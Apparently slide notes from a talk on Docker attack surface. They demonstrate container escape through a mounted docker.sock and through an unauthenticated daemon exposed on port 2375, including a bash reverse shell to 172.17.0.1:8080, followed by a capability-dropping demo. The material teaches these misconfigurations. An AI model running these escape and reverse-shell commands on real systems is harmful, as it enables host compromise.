The speaker discussed the docker attack surface. Furthermore, he demonstrated how an attacker can escape the docker container and gain access to the host machine.
8. § Some Container require /var/run/docker.sock to be mounted on containers
§ It is required if docker container requires to interact with host
§ For e.g. – ‘Dockerized’ Host Monitoring Application
ü docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine
ü docker exec -it <id> sh
ü apk update
ü apk add -U docker
ü docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh
9. § Allows to interact with remote Docker Daemon
§ No authentication required - By Default
§ Lets gain shell!
ü sudo apt install jq
ü sudo vi /lib/systemd/system/docker.service
ü ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
ü sudo systemctl daemon-reload
ü sudo service docker restart
ü curl http://localhost:2375/containers/json | jq
ü docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"
10. § docker run -itd alpine
§ docker run --rm -it --cap-drop=NET_RAW alpine sh
§ ping 127.0.0.1 -c 2
§ Printing Capabilities: capsh --print